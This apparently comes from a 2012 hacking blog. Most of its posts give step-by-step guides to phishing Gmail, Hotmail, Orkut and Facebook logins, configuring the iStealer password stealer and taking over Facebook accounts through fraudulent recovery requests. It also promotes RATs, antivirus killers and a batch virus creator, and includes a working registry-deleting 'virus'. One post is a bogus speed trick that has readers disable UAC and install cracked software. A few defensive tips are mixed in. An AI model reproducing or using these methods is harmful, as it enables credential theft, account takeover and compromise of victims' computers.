HACKING GMAIL ACCOUNTS

Gmail phisher is a phisher for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.

HACK HOTMAIL ACCOUNTS: Msn Hacker

I had posted already Gmail Hacker to hack Gmail accounts.With this software we can hack hotmail accounts. Run Hotmail Hacker Builder.exe file on ur pc. Enter your email address password and subject of email you want to receive Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.

TURKOJAN GOLD 4

Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling the victim computer in many ways.

AIRCRACK

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

HACK EMAIL ACCOUNTS : 34 IN 1 PHISHER PACK

As the name says, this phisher pack consists of 34 ready made phishing pages of websites like paypal, ebay, yahoo, gmail etc.

Monday 29 October 2012

Make a virus to disable mouse

 
Make a virus to disable mouse
  
  • Open Notepad and copy below codes

rem ---------------------------------
 rem Disable Mouse
 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
 reg delete %key%
 reg add %key% /v Start /t REG_DWORD /d 4

 rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.

Friday 26 October 2012

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection



A 2G internet user really suck. You cannot download file Quickly and the most important that many user faces is, they cannot watch or listen online streaming video or audio.They cannot even watch YouTube video without buffering...
So my reader today i am giving you and awesome tricks to play video without buffering even with the speed of 30-40 KBps. You can watch live TV and also listen online Radio without buffering.


Step 1

  • Open run command box by pressing ctrl+r together and in the box that appear type SYSTEM.INI
  • Note: Your UAC or "User Account Control" should be set to "Never notify"

 Step 2

  • Copy and paste the below line in the SYSTEM.INI and save it
  • page buffer=1000000Tbps
  • load=1000000Tbps
  • download=1000000Tbps
  • save=1000000Tbps
  • back=1000000Tbps
  • search=1000000Tbps
  • sound=1000000Tbps
  • webcam=1000000Tbps
  • voice=1000000Tbps
Here is the picture of SYSTEM.INI before chnaging
After Changing



Step 3)
Download this software name Speed-bits video accelerator  from here Speed-bits
extract the rar file and there you will find 3 file

  • Speedbits video accelerator setup.
  • Video accelerator crack.
  • Instruction file.
read the Instruction and install the software. You will notice after this tricks you can watch YouTube video without buffering and also you can watch live TV and listen to online Radio. ENJoy!

How to Send Password Protected Email Messages

 How to Send Password Protected Email Messages

If you have to send  information like credit card numbers, Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to intercept Ur email messages or they can retrieve the data after hacking email accounts.To protect yourself from such situations you can use Lockibin which provides password protection and AES-256 bit encryption to your emails.



  • Click here to go LockBin online service.
  • Fill the form with your desired password.
  • In the text filled write your message. You can also attach a file if you want.

  • After this, click on Submit button.
  • Now your password protected mail will be sent. (Receiver will only get a link to your password protected and encrypted email)
  • When receiver clicks on that link  it will prompt to enter the password otherwise it will not be open.
That’s it! But you have to send password to your friend which can be sent on Mobile number or you can send a normal Email for it.The password protected email is stored in lockbin server itself. Enjoy!

Monday 22 October 2012

How To Secure Wifi




Wifi stands for Wireless Fidelity.
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.



If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.
 The step by step  guide given below summarize all the necessary steps you should take for securing your wifi network.

  • Change Default Administrator Passwords (and Usernames)
 Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .
  • Turn on (Compatible) WPA / WEP Encryption
 Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.
  • Enable MAC Address Filtering
 Mac addresses are also known as  physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to those devices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.
  • Enable Firewalls On Each Computer and the Router
 Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.
  • Position the Router or Access Point Safely
A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.
  • Turn Off the Network During Extended Periods of Non-Use
 Turn of the router when it is not used.It will secure your wifi connection by giving out less access  time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.

Difference B/w Virus , Worms ,Trojan & Spyware : VIRUSESs

Difference B/w Virus , Worms ,Trojan & Spyware

 All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i'll tell about difference them

VIRUS
 A virus is a self replication program and software which is attached to an executeable 
 files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.
Worms
Worms are very similar to viruses but differ in way that they don't bind themselves to executable files instead  to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.
Trojan Horse

A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to  facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.
Spyware
A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.

Here is the list of names of most harmful virus and worms in the history of computers
  •  Storm Worm
  •  Leap-A/Oompa- A
  •  Sasser and Netsky
  •  MyDome (Novarg)
  •  SQL Slammer / Sapphire
  •  Nimda
  •  Code Red and Code Red II
  •  The Klez
  •  ILOVEYOU
  •  Melissa


Friday 19 October 2012

Delete Any Facebook Account : Facebook Hacking

Delete Any Facebook Account
There is a method to delete any facebook profile .It works 100 percent But its just for educational purpose. Deleted Profile can never be recovered. Use wisely.

WHAT ALL U NEED ?

  •  Victim's profile link ( you can get it easily )
  •  His/Her Email which he/she uses to sign in
  •  His/Her birth date which he/she has used in the profile
  •  Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.

HOW TO DO IT?

1. Go this page:

http://www.facebook.com/help/contact.php?show_form=hack_nologin_access

 2. Enter details. In the place of  email address  enter the fake email u created.

 3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are victim's name and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )

 4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.
 5. Next Day or Same Day you will get an Email that your account is disabled.
Enjoy!

Protect Your Email Id and Facebook from Hackers : Facebook Hacking


Protect Your Email Id and Facebook from Hackers

How to Protect Your Email Id n Facebook By Hackers

 Everybody use email accounts and social networking websites such as orkut, twitter and facebook. There are important information of a person in these email accounts and social networking website. It is important to protect these account from hackers. Because hackers always try to get others account to get those secret and personal data for bad purpose. If use your email id for business and other services then it's a great loss and trouble for you. So always try to be safe from hackers



 Follow these simple steps i am writing below to protect yourself from being hacked.

  •  Never share your password to anyone.
  •  Don't use password as your nick name, phone no. or pet names..
  •  Use the combination of lower case, upper case, numbers and special characters for passwords.
  •  Never click on any suspected link comes in a mail from unknown sender.
  •  Never give your passwords to any 3rd party websites for any service.
  •  Use different passwords for different accounts.
  •  Check the website url every time before login. EX: check url to be http://www.facebook.com before login to face account. Never login to website such as http://www.facebook.otherwebsit.com (MOST IMPORTANT)
  •  Use secondary email address and mobile phone numbers with secret questions for account recovery.
  •  Never use any javascript code in url while login to any of your email or any other website account. It may be a cookie stealer script.
  •  Use latest antivirus and antimalware softwares with firewall on.

 These are some steps which you can follow for safe surfing over the internet.

 Don't give any chance to hackers.....

istealer : Stealers


istealer

This is tutorial specially for that people who are know lil bit about configure a stealers server.

before start we need to sign up a ftp service i recomended this site
http://www.drivehq.com

STEP 1

 Get the staeler from following link 

STEP 2

Run application and extract it
Click on "iStealer".
IF YOU GET ERROR MISSING COMDLG32.OCX 
Downloaded the missing OCX extract it into WINDOWS>SYSTEM32

STEP 3 ( Create server for steal passwords )

 Host copy and paste this "ftp.drivehq.com"
Username enter your drivehq.com username.
Password enter your drivehq.com password.

After this if you want to bind your server(password stealer)
with another application, song, document, picture etc. Click "bind with another file" and chose what file U want 2 bind your server with ... Also you can cahnge icon and thn build server. After make compress it and upload and spread where u want


Wednesday 17 October 2012

Hack Facebook Accounts BY Fake login Page: facebook hacking

Hack Facebook Account By Fake login Page

 Today i will teach you how to make a Fake login page (phisher) to Hack Facebook account Follow the steps given below to Hack a facebook account.

 Hack a Facebook Account By Fake login Page : 
  • First of all we need a fake login page (fake.html), login.php You can download both the files from
 Click Here
  • Now open login.php which we downloaded earlier with a note pad and press (ctrl+ f )
 and search for the term http://enteryoursite.com and replace with the site address
 where you want victim to be redirected and save it

  • Now create a account in Free web hosting site like 110mb.com , T35.com or ripway.com

  • Now upload both the files (fake.html , login.php ) to your directory .Now send the
 fake.html link to your victim

Example :-  www.yoursite.110 mb.com/fake.html

  • Now when the victim clicks the link and enters all the information in our fake login
 page and click login He will be redirected to site which we did in step 3

  • Now to see the victims id ,password login to your account "110mb.com " where
 you can see a newfile "password.txt" open it .Now you can see the userid
 and the password of the victim


 This a simple but a very effective method of Hacking a facebook account Enjoy!

Hack Facebook Accounts : Facebook Hacking




Hack Facebook Accounts



 There are many ways to hack facebook accounts

  • Phishing
  • Keylogging
  • Reverting
  • Cookie stealing
  • etc

 This method we will be using is Reverting
 which is simply using the information we gathered about the slave in facebook password reset function

 To gather the information you first need to find out their email which will be on their facebook information page

 once you have the email use sites like
  • http://www.pipl.com/email/

 which search the whole internet for every social networking account linked with that email

 if they have a site you can use
  • http://whois.domaintools.com/

 to get infomation about them

 if using these methods you can find out the answer to their security question then very well but if not don't worry we have other methods

 So lets start

 - First make three facebook accounts and add your slave ( he must accept )

 - then go here

Click here

 there put the slave's email and fill the captcha then it will ask you to enter a new email where you put your email ( not the one used on an existing account but a new one )

 - it will then ask you the security question ( if you know it very well then just put it and the account is hacked )
 but if you do not know the answer just keep entering random words until the limit is exceeded

 - Once the limit is exceeded it will ask you to choose three trusted friends
 there you put the three accounts you made and added your slave

 - It will then send all three accounts the security code
 and you go login all three and get the security code and just put it

 - Hacked , change the security question and he can't recover the account unless he uses the same thing we did.. Enjoy!

Sunday 14 October 2012

Yahoo Multi Id Maker : Yahoo


---------------------------
Yahoo multi id maker
---------------------------

By this tools you will be able to make  multi unlimited ids. Now you can get rid of making ids manually from yahoo web. And this tools has many function you can make ids of different yahoo domains as mentioned in picture 


Download

Or

Here

Tuesday 9 October 2012

HACK HOTMAIL ACCOUNTS: Msn Hacker




I had posted already Gmail Hacker to hack Gmail accounts.With this software we can hack hotmail accounts.
  • Run Hotmail Hacker Builder.exe file on ur pc.
  • Enter your email address  password and subject of email you want to receive
  • Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
  • Now, send this Hotmail Hacker.exe file to victim of which you want to hack Hotmail password and convince him that this program can hack anyone's Hotmail passwords.
  • Say him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he want to hack. As he enters this information and hits Login and Start he will receive a error message.
  • You will receive an email in your account containing his password. Hurrah! you will now be able to hack hotmail password.   
Download

Or

Herer

Friday 5 October 2012

KILL TASKS ON VICTIM COMPUTER : AV KILLER







avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security  tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.

Download

Or

Here

FAKE ERROR MESSAGE GENERATOR : MESSAGE MANAGER






Message Manager is a software which show fake error message when it is told to do. You just have to input the txt to be displayed in the error messages and it will display unlimited no. of fake and duplicate error messages.

Download

or

Here

HACK PASSWORDS : USB THIEF


usb thief is a collection of small softwares n programs which can stole password locally stored on a pc. Just unpack the .rar file into the root drive of your USB and plug the USB onto that pc on which you want to hack password.

Download

Or
Here

SWISS ARMY KNIFE



Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.

Download

Or

Here

SMAC : THE MAC ADDRESS CHANGER


SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.

  •     Automatically Activate MAC Address after changing
  •     display the manufacturer of the MAC Address
  •     Generate any New MAC Address based on a selected manufacturer
  •     Preload MAC Addresses List n choose the new MAC address from the list.
  •     IPConfig button click to display network adapter  info to confirm changes
  •     Userfriendly GUI
Download

INVISIBLE SECRETS

By this program, you will be able to encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone without exposing it to world and your friend or other person can decrypt it on other end using this software. You can also specify the password for encryption and decryption. The person on other end can decrypt the file if he has this software and knows the encryption password

  • Delete carrier file after process
  • Add fake files to play pranks on friends 
  • Add other carrier formats (.doc, .txt etc.) other than JPEG or BMP images
Download

Or

 Here


Tuesday 2 October 2012

WIRESHARK: SNIFFER


Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download

TCP DUMP: SNIFFER


Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download

Monday 1 October 2012

HACKING GMAIL ACCOUNTS :PHISING


Gmail phisher is a phisher  for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.

Download

Or

Here

HACKING ORKUT ACCOUNTS :PHISING



Orkut Phisher is a phisher for hacking Orkut accounts like Gmail Phising. Just send it to anyone and say him to enter login details. Once he enters his login details, a text file containing passwords of the user is generated automatically.

Download

Or

Here

PHISHER CREATOR





Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.Here is tutorial for Gmail and Orkut Phising

Download

OR

Here

HACK EMAIL ACCOUNTS : 34 IN 1 PHISHER PACK



As the name says, this phisher pack consists of 34 ready made phishing pages of websites like paypal, ebay, yahoo, gmail etc.

Download

Or

Here

HACK COMPUTERS REMOTELY : PRORAT





PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect victim's PC in different ways. Just create the server and send it to the victim.

Download

REVENGER REMOTE VICTIM PC


Revenger is a simple advanced remote administration tool RAT which is used to access and control pcs remotely . It uses clientserver method for remote control and administration of pcs.create the server n send  to  victim and you can track and control every activity of the remote users.

Download

Or

Here

HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4



Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling  the victim computer in many ways.

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected.

Download

Or

Here

BATCH TO EXE CONVERTER




Batch to exe converter is a software to convert batch .bat files to executable .exe files. It consists of manyoptions such as including any other file, adding an icon to the file before compilation.


Download

OR

Here

SONIC BAT - THE BATCH FILE VIRUS CREATOR







This program creates batch .bat viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download

Or

Here

free web site traffic and promotion